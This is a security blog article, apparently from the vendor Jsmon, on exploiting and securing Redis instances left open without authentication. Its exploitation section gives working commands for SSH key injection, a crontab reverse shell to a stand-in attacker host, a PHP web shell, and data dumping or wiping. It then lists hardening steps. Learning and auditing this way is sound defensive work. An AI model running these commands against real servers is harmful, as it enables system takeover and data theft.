cybersecurity

What is Redis Unauthenticated Access? Ways to Exploit, Examples and Impact

Explore how Redis unauthenticated access leads to RCE and data theft. Learn exploitation methods like SSH injection and critical security mitigations.

Siddhartha Katiyar

6 min read
What is Redis Unauthenticated Access? Ways to Exploit, Examples and Impact

Redis (Remote Dictionary Server) is widely celebrated for its speed and versatility as an in-memory data structure store, often used as a database, cache, and message broker. However, its historical design philosophy prioritized performance over security, leading to a common and devastating vulnerability: unauthenticated access. When a Redis instance is exposed to the internet without proper access controls, it becomes a goldmine for attackers, offering a direct path to data exfiltration and full system compromise.

What is Redis?

Before diving into the vulnerabilities, it is essential to understand what Redis is and why it is so ubiquitous. Redis is an open-source, in-memory data structure store that supports various data types such as strings, hashes, lists, sets, and sorted sets. Because it stores data in RAM rather than on disk, it provides sub-millisecond latency, making it the go-to solution for real-time applications, session management, and high-frequency trading platforms.

In a typical architecture, Jsmon users might find Redis sitting behind a web application, caching database queries to reduce load. While Redis is incredibly powerful, it was originally designed to be accessed by trusted clients inside a trusted environment. This means that, by default, older versions of Redis did not require a password, assuming that the network layer would provide the necessary security. When developers neglect to configure these network layers or passwords, the instance becomes "unauthenticated."

The Root Cause of Redis Unauthenticated Access

The primary reason for Redis unauthenticated access is misconfiguration. There are three main factors that contribute to this exposure:

  1. Default Binding: By default, if not explicitly configured, older versions of Redis might bind to all available network interfaces (0.0.0.0). This means the service listens for connections from anywhere on the internet if the server has a public IP.
  2. Lack of Password Protection: The requirepass directive in the redis.conf file is often left commented out or empty. Without this, anyone who can reach the port (default 6379) can issue commands.
  3. Disabled Protected Mode: Redis introduced a "protected mode" in version 3.2.0. If Redis is running with the default configuration and without a password, it will only respond to queries from the loopback interface (127.0.0.1). However, administrators often disable this mode to allow legitimate remote connections without implementing alternative security measures like a VPN or firewall rules.

When these three factors align, an attacker can simply use a tool like redis-cli to connect to the remote host and take full control of the data store.

Identifying an Exposed Redis Instance

For a security professional or a researcher using Jsmon for infrastructure reconnaissance, identifying an exposed Redis instance is the first step. This is usually done through port scanning and banner grabbing.

Using Nmap

An attacker or auditor can use Nmap to find open Redis ports and check for unauthenticated access using a script:

nmap -p 6379 --script redis-info <target-ip>

If the instance is vulnerable, the output will display system information, including the Redis version, operating system, and connected clients. If the instance is protected, Nmap will return an error stating that authentication is required.

Using Redis-CLI

The simplest way to check for access is to attempt a connection using the native command-line tool:

redis-cli -h <target-ip>
<target-ip>:6379> INFO

If the INFO command returns a long list of server statistics, the instance is unauthenticated and fully exposed.

Ways to Exploit Redis Unauthenticated Access

Once access is gained, the impact can range from simple data theft to Remote Code Execution (RCE). Below are the most common exploitation vectors.

1. Information Disclosure and Data Manipulation

The most immediate impact is the ability to read and modify all data stored in the cache. Attackers can use the KEYS * command to list all keys and GET <key> to retrieve sensitive information like session tokens, PII (Personally Identifiable Information), or internal API keys.

# List all keys
KEYS *

# Get sensitive session data
GET user:session:12345

Furthermore, an attacker can flush the entire database using FLUSHALL, causing a massive Denial of Service (DoS) for the application relying on that cache.

2. Remote Code Execution via SSH Key Injection

If the Redis service is running as the root user (a common but dangerous practice) and the server has an SSH service active, an attacker can inject their own SSH public key into the /root/.ssh/authorized_keys file.

Step-by-step process:

First, the attacker generates a public/private key pair on their local machine. Then, they format the public key with newlines to ensure it is parsed correctly by the SSH daemon.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > spaced_key.txt

Next, they write this key into the Redis memory:

cat spaced_key.txt | redis-cli -h <target-ip> -x set ssh_key

Finally, they use Redis commands to change the working directory to the SSH folder and save the memory contents (the RDB file) as the authorized_keys file:

redis-cli -h <target-ip>
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename "authorized_keys"
SAVE

After these commands, the attacker can log in to the server via SSH without a password, gaining a full root shell.

3. Remote Code Execution via Crontab

If the SSH directory is not available or writeable, an attacker can target the system's cron jobs to execute a reverse shell. This is achieved by setting the Redis directory to a cron directory, such as /var/spool/cron/ or /etc/cron.d/.

redis-cli -h <target-ip>
CONFIG SET dir /var/spool/cron/crontabs/
CONFIG SET dbfilename root
SET payload "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/attacker-ip/4444 0>&1\n\n"
SAVE

This payload instructs the system to execute a bash reverse shell every minute. Once the SAVE command is issued, Redis writes the payload to the root crontab file, and the attacker receives a connection on their listener.

4. Writing a Web Shell

If the server is hosting a web application (e.g., Apache or Nginx) and the attacker knows the absolute path of the webroot (e.g., /var/www/html), they can write a PHP web shell to the disk.

redis-cli -h <target-ip>
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET test "<?php system($_GET['cmd']); ?>"
SAVE

After saving, the attacker can visit http://<target-ip>/shell.php?cmd=id to execute arbitrary commands through the browser.

The Impact of Redis Exposure

The consequences of an exposed Redis instance are severe. Because Redis often sits at the heart of an application's infrastructure, its compromise leads to:

  • Full System Takeover: As shown in the RCE examples, attackers can gain administrative access to the underlying operating system.
  • Data Breaches: Sensitive user data, credentials, and business logic stored in the cache are easily exfiltrated.
  • Lateral Movement: An attacker can use the compromised Redis server as a pivot point to attack other internal resources within the VPC or local network.
  • Ransomware: Attackers may encrypt the Redis data or the entire server and demand payment for its release.
  • Compliance Violations: For businesses subject to GDPR, HIPAA, or PCI-DSS, an unauthenticated database is a major compliance failure that can lead to heavy fines.

How to Secure Your Redis Instance

Securing Redis is straightforward if you follow best practices. It is critical to move away from the "trust the network" mindset and implement defense-in-depth.

1. Enable Authentication

Always set a strong password in your redis.conf file using the requirepass directive. For Redis 6.0 and later, use the Access Control List (ACL) feature to create specific users with limited permissions.

# redis.conf
requirepass your_very_strong_and_long_password_here

2. Bind to Localhost or Specific IPs

Never allow Redis to listen on all interfaces. Bind it only to the specific internal IP addresses that need access, or better yet, only to 127.0.0.1 if the application is on the same server.

bind 127.0.0.1

3. Rename Dangerous Commands

You can disable or rename commands like CONFIG, FLUSHALL, and EVAL to make it harder for an attacker to manipulate the server environment even if they gain access.

rename-command CONFIG ""
rename-command FLUSHALL "SECRET_FLUSH_CODE"

4. Use Firewalls and VPCs

Ensure that port 6379 is blocked at the network firewall level. Only allow traffic from known, trusted IP addresses (e.g., your application servers). If you are in the cloud, use Security Groups to restrict access.

5. Run Redis with Low Privileges

Never run the Redis service as the root user. Create a dedicated redis user with minimal permissions on the filesystem. This prevents attackers from writing to sensitive directories like /root/.ssh/ or /etc/cron.d/.

Conclusion

Redis unauthenticated access remains one of the most common "low-hanging fruits" for attackers. While the tool itself is a marvel of engineering, its security depends entirely on the administrator's configuration. By understanding the exploitation techniques-from SSH key injection to web shell creation-security teams can better appreciate the risks and prioritize remediation. Regular audits, strong authentication, and strict network filtering are the keys to keeping your data stores safe.

To proactively monitor your organization's external attack surface and identify exposed Redis instances before attackers do, try Jsmon.

Read more